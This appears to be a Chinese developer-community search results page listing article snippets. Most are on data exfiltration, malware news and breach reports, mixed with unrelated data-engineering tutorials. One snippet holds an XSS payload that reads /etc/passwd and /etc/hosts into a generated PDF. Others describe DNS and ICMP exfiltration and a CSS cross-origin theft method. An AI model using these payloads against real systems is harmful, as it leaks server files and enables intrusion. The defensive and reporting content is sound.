- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全
攻防实战:数据窃取技术详解
一、概述(Overview)数据窃取是指未经授权地、隐蔽地将敏感数据从受控的内部网络复制并转移到攻击者控制的外部位置的过程。 网络犯罪分子攻击公司的目的各异,但多数情况下最终目标是数据泄露,即将窃取的敏感数据在暗网出售或公开。 通常涉及持续的数据发送和接收。三、基于常见网络协议的数据窃取技术#####A.TCP套接字窃取(TCPSocketExfiltration)原理与适用场景:直接利用TCP套接字建立连接并传输数据。 3.ICMPC2通信(ICMPDoor工具):原理:基于Python3和Scapy开发的ICMP反向Shell,利用ICMP数据包的数据部分双向传输命令和执行结果。 DNS数据窃取(DNSDataExfiltration)DNS数据窃取是一种将敏感数据编码后,通过一系列DNS查询发送到攻击者控制的DNS服务器的网络攻击。
56541编辑于 2025-12-31 - 来自专栏数据湖
数据仓库实战 3
经过前面那么久的折腾,我们终于可以切入主题了,接下来我们用数仓分层的理论,在Hive中建立数据仓库。 ODS层 启动Hive客户端,创建gmall数据库 [root@cdh2 ~]# hive 0: jdbc:hive2://cdh1.macro.com:2181,cdh2.macr> create ,我们可以看到ods_start_log表已经有数据了 DWD层 创建启动表 0: jdbc:hive2://cdh1.macro.com:2181,cdh2.macr> drop table if > PARTITIONED BY (dt string); DWD层启动表加载数据脚本 新建脚本dwd_start_log.sh #! _3e88639f-e439-40d3-bd7b-bbbb2159fb3b): insert overwrite table gmall.dwd_start_log PARTITION (dt='2020
1.4K20发布于 2020-12-18 - 来自专栏Khan安全团队
XSS 从 PDF 中窃取数据
<script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
33910编辑于 2025-04-28 - 来自专栏python3
R语言数据挖掘实战系列(3)
R语言数据挖掘实战系列(3) 三、数据探索 通过检验数据集的数据质量、绘制图表、计算某些特征量等手段,对样本数据集的结构和规律进行分析的过程就是数据探索。 缺失值的影响有(1)数据挖掘建模将丢失大量的有用信息;(2)数据挖掘模型所表现出的不确定性更加显著,模型中蕴含的规律更难把握;(3)包含空值的数据会使建模过程陷入混乱,导致不可靠的输出。 对变量做一个描述性统计,进而查看哪些数据是不合理的。最常用的统计量是最大值和最小值,用来判断这个变量的取值是否超出了合理的范围。 (2)3σ原则。 如果数据服从正态分布,在3σ原则下,异常值被定义为一组测定值中与平均值的偏差超过三倍标准差的值。如果数据不服从正态分布,也可以用远离平均值的多少倍标准差来描述。 (3)箱型图分析。 1.定量数据的分布分析 对于定量变量,选择“组数”和“组宽”是做频率分布分析时最主要的问题,一般按照以下步骤:(1)求极差;(2)决定组距与组数;(3)决定分点;(4)列出频率分布表;(
1.5K30发布于 2020-01-08 - 来自专栏自动化测试实战
Jmeter性能测试 -3数据驱动实战
什么是数据驱动? 从数据文件中读取测试数据,驱动测试过程的一种测试方法。数据驱动可以理解为更高级的参数化。 特点:测试数据与测试代码分离;数据控制过程 好处:降低开发和维护成本,减少代码量,便于用力修改和维护 Jmeter数据驱动实战 环境 我在本地搭建了数据库【如果不会可以留言,我再出搭数据库的帖子】 可以看到,我在连接数据库的url上添加了 ? 然后添加JDBC Request,对movies表进行查询 执行可以看到结果树中输出了数据库查询到的数据 我们做如下需求:如果year>=2016,就说它是新电影,否则就判断为老电影。 ,生成了{__V(rows_{count},)},把它放到如果控制器判断里即可 结构目录 执行后就看到 而且在控制台输出了3个 当然除了读数据库数据,数据驱动还可以写Excel读,那就不需要循环控制器了
61010编辑于 2022-04-12 - 来自专栏FreeBuf
防范数据窃取从了解其手法做起
数据窃取是针对组织攻击链中的最后一个阶段。攻击者窃取数据的技术可谓花样百出,网上也有大量关于数据窃取方面的技术文档以及工具。 工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们! Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。 出站SMTP/POP3/IMAP是否可用。检查加密以及未加密的端口 - 25/465/587,110/999,143/993。 是否存在错误配置的邮件中继?是否可以通过欺骗内部地址来中继到外部地址? 检查笔记本USB插口是否已锁定,MP3播放器和智能手机。是否已设置仅允许授权USB连接选项。 可以将数据保存在CD和DVD中,相较于USB它们更难以泄露数据。 笔记本上的资产贴纸,是否有任何泄露信息?
73530发布于 2018-08-21 - 来自专栏安恒网络空间安全讲武堂
用css绕过同源策略跨域窃取数据
用css绕过同源策略跨域窃取数据 序言 如果你和我一样无聊,你可能遇到过这种潜在的攻击 -》https://www.w3.org/TR/CSP2/#security-css-parsing 如果浏览器使用了一种宽松的 最后我们就 可以通过这样的方式完成跨域窃取敏感信息,数据甚至可能包含csrf所需的token,或者更敏感的个人信息。 攻击的一些前提约束 要窃取的数据必须在payload1和payload2之间。 要窃取的数据不能同时存在单引号和双引号,否则会破坏解析的结构。 (数据最后要被解析为css一个属性的值) 要窃取的数据不能包含换行符(css值不支持多行) 这些条件在现代的编码风格下是很难遇到,尤其是不允许出现换行。 我们需要一个可以写任意字符串的属性,这样才能导入我们要窃取的数据。”font-family”是最佳的选择。
1.5K90发布于 2018-02-06 - 来自专栏网络安全
DeepSeek 恶意 Python 包,正在窃取你的数据
研究人员发现,Python 软件包索引(PyPi)中植入了恶意的、模仿 DeepSeek 的软件包,这些代码实际上携带着信息窃取程序。 研究人员指出,“deepseeek” 和 “deepseekai” 在执行时会释放信息窃取程序,以窃取敏感数据,包括 API 密钥、数据库凭证和权限。
51910编辑于 2025-02-06 - 来自专栏大数据文摘
“窃取用户数据”?看阿里如何应对
支付宝与付费通终止合作后,网上突然出现很多支付宝“窃取用户数据”的言论。商务合作终止固然遗憾,但“盗窃”的罪名更重大,尤其是涉及到大家非常关注的数据问题。 毫无疑问我们非常看重数据,数据将会成为改善全社会商业环境的重要资源,我们坚信数据的力量和价值。阿里巴巴从五年前就确定“开放的数据平台”作为自己的战略目标,并且重兵布局云计算和大数据。 3、没有规矩不成方圆,数据的价值在于运用和分享,那么我们对于数据合作和分享的基本原则是什么? 今天不管是我们还是整个社会,都已经积累了非常宝贵的数据资源。 如何有效地发挥这些数据的价值,建立一种数据交换以及数据标准的能力,我们的思考才刚刚开始。 其中已经形成了一些基本的原则,这里跟大家分享一下: (1)客户信息保护原则,所有涉及到客户信息的使用都必须建立在客户主动、自愿和授权的基础上 (2)客户隐私有效保护原则,绝对保证用户的信息隐私安全; (3)
69950发布于 2018-05-21 - 来自专栏火绒安全
AgentTesla病毒解析:利用钓鱼邮件窃取终端隐私数据
当用户被诱导点击运行病毒后,病毒即会窃取用户终端上的隐私数据并上传C&C服务器。 ͼƬ2.png AgentTesla病毒样本通常使用混淆器,通过数据加密、代码加密、控制流混淆等多种混淆方式藏匿自身病毒特征,对抗安全软件查杀。 AgentTesla病毒的主要危害是窃取用户终端中的隐私数据,隐私数据包括用户浏览器登录凭证、FTP软件登录凭证、电子邮件登录凭证、键盘记录信息、屏幕截图、用户系统配置信息等。 ͼƬ3.png
73620编辑于 2022-05-20 - 来自专栏JavaEdge
数据结构与算法实战之图论3
3
41610发布于 2018-08-22 - 来自专栏快学Python
Python数据分析实战(3)Jupyter Notebook使用
可以看到,notebook界面由以下部分组成:(1)notebook名称;(2)主工具栏,提供了保存、导出、重载notebook,以及重启内核等选项;(3)notebook主要区域,包含了notebook 3.Jupyter中使用Python Jupyter测试Python变量和数据类型如下: ? 测试Python函数如下: ? 测试Python模块如下: ? 可以看到,在执行出错时,也会抛出异常。 ## val attr = item.split(",") ## Rating(attr(0).toInt, attr(1).toInt, attr(2).toDouble, attr(3) ') rating = Rating(int(attr[0]), int(attr[1].strip()), float(attr[2].strip()), int(attr[3] 提取分类 name = data[1] ## 提取店铺名称 comment_count = fcomment(data[2]) ## 提取评论数量 star = data[3]
6.1K20发布于 2021-08-09 - 来自专栏golang云原生new
Statefulset 实战 3
通过标签发现环境中少了一个 pod,因此 Statefulset 会立马创建一个和刚才少的那个一模一样的 pod 通过我们查看 pod 的名称和索引值是我们所期望的,并且是 curl 访问 pod 的提供的接口,获取的相应数据也是我们所期望的 修改副本个数为 3 修改副本数,只需要 kubectl get statefulset 修改 spec 下的 replicas 字段即可 修改副本数之后,通过如下命令查看相应资源情况 kubectl kubectl edit statefulset sta-kubia kubectl get po | grep sta kubectl get pv kubectl get pvc 副本数修改为 3 操作和上述类似,将副本数修改为 1 即可 进行缩容之后,我们可以看到 索引为 3 和 2 的 两个 pod 都被删掉了,但是他们的 持久化卷声明和持久化卷仍然还在,当然里面的数据也是还在的,感兴趣的小伙伴可以尝试使用 curl 命令去请求一下,结果会如你所愿 将副本数修改回 3 那么现在我们再进行扩容,Statefulset 是否会将刚才删除的 2 个 pod全部恢复回来呢?
30510编辑于 2023-09-01 - 来自专栏python3
Python3网络爬虫实战-3、数据库的
3. 验证安装 安装完成之后,可以在 Python 命令行下测试。 $ python3 >>> import lxml 如果没有错误报出,则证明库已经安装好了。 1.2.2 BeautifulSoup的安装 BeautifulSoup 是 Python 的一个 HTML 或 XML 的解析库,我们可以用它来方便地从网页中提取数据,它拥有强大的 API 和多样的解析方式 3. Pip安装 pip3 install pyquery 3. 验证安装 安装完成之后,可以在 Python 命令行下测试。 Tesseract 文档:https://github.com/tesseract-... 3.
1K30发布于 2020-01-03 - 来自专栏Corley的开发笔记
Python数据分析实战(3)Python实现数据可视化
文章目录 一、数据可视化介绍 二、matplotlib和pandas画图 1.matplotlib简介和简单使用 2.matplotlib常见作图类型 3.使用pandas画图 4.pandas中绘图与 构造数据如下: df=pd.DataFrame(np.random.randn(3,4),index=list('123'),columns=list('ABCD')) df2=pd.DataFrame 多条折线图 #数据处理 data2 = pd.DataFrame(orders[orders['商家名称'].isin(['店铺3','店铺5','店铺6','店铺9'])].groupby(['商家名称 堆积柱形图 #数据处理 data3_tmp = pd.DataFrame(orders.groupby(['平台来源','付款时间'])['支付金额'].sum()) data3 = pd.DataFrame ind in data3.index: print(ind) for col in data3.columns: data3.loc[ind,col] = data3_
5.3K20发布于 2020-08-31 154个数据库被黑客窃取?ASML回应
该黑客声称,此次窃取的信息涵盖多类敏感数据,包括磁盘加密密钥、用户数据(用户名/密码)、软件信息以及特定设备的详细信息。 如果消息属实,这将远远超出一般的客户数据泄露事件,将会对ASML公司带来严重的负面影响。这意味着攻击者攻破了ASML的安全系统,并可以访问ASML公司高度敏感的数据。 不过,ASML在最新发布的声明中否认了公司遭黑客窃取数据的说法。 “ASML注意到2026年1月6日在BreachForums上发布的一篇帖子,该帖子声称公司信息被泄露。 所提及的文档中没有来自ASML的数据。”ASML在声明中写道。 第三方的安全研究团队经过分析后也认为,黑客“1011”兜售的所谓ASML的数据实际上毫无用处。 此外,研究人员还发现,黑客“1011”与本周早些时候宣布NordVPN数据泄露的攻击者是同一人。NordVPN公司随后也否认丢失任何数据,该公司代表称这些说法“不实”。
8810编辑于 2026-03-19- 来自专栏Nuxt.js 实战系列
Nuxt3 实战 (七):配置 Supabase 数据库
前言 这个章节我们要先把数据库的环境配置好,古人云:工欲善其事,必先利其器。 后来认真看了 Nuxt 集成的数据库模块后,还是选择了 Supabase,在我看来主要原因有3点: Supabase 网上风评比较好,而且 Nuxt 集成了 Nuxt Supabase 模块 用户认证和身份鉴权开箱即用 创建 Supabase 数据库 1、打开 Supabase Dashboard,选择登录方式,这里我直接选择 Github 登录 2、 进入控制台,点击 New project 创建项目 3、 进入项目管理界面 SUPABASE\_URL 和 SUPABASE\_KEY SUPABASE\_URL="https://example.supabase.co" SUPABASE\_KEY="<your\_key>" 3、 Project API keys: anon key:如果为表和已配置的策略启用了行级安全性,则可以在浏览器中安全使用此键 service\_role:此密钥具有绕过行级安全性的能力,永远不要公开分享 3、
2.6K00编辑于 2025-08-13 浏览器“隐私”扩展被曝窃取AI对话数据
浏览器“隐私”扩展被曝窃取AI对话数据据Koi Security的研究报告,四款声称保护隐私的流行浏览器扩展程序实则背道而驰。 这些恶意插件一直在窃取超过800万用户的聊天机器人对话文本,并将其发送回开发者。 达迪克曼解释道,数据收集功能通过硬编码的配置标志默认启用。“没有面向用户的开关可以禁用此功能。停止数据收集的唯一方法是彻底卸载该扩展。” 他说,“要么是审核没有检查从某中心自家AI产品(Gemini)窃取对话的代码,要么是检查了但不认为这是个问题。” 该政策允许在有限场景(例如安全或业务所有权变更)下将数据传输给第三方,但这些场景不包括将数据传输给数据代理。
32210编辑于 2026-01-01- 来自专栏数据猿
美国大规模窃取全球数据 该用什么来保障中国数据安全?
斯诺登曾说不想生活在一个一言一行都被记录的世界,但近十年来,美国的窃取数据行动不断被曝光,中国的数据安全又将走向何方? 美国的窃取数据丑闻不止于此,自2013年斯诺登曝光棱镜计划开始,美国的数据窃取行为就如同浮出的冰山一角,其水下的庞大组织逐渐曝光。 2020年3月,中共中央、国务院发布了《关于构建更加完善的要素市场化配置体制机制的意见》,首次将“数据”这一新型要素与土地、劳动力、资本、技术等传统要素并列,数据成为一种新的资产。 今年6月3日,美国两院联合发布了《美国数据隐私和保护法案》草案文本,这是首个获得两党、两院支持的全面的关于国家数据隐私和数据安全框架的立法草案。 中国信创产业政策 可以预见,接下来围绕数据安全的全球攻防战,将愈发激烈。美国系统性攻击他国网络、窃取他国数据的行为,将会持续进行。
1K30编辑于 2022-09-04 - 来自专栏python3
maven实战笔记-3
pom.xml示例 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w<em>3</em>. 运行jar java –jar target/testMaven-0.0.1-SNAPSHOT.jar 3.8 使用Archetype生成项目骨架 如果是Maven<em>3</em>,
69410发布于 2020-01-14
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号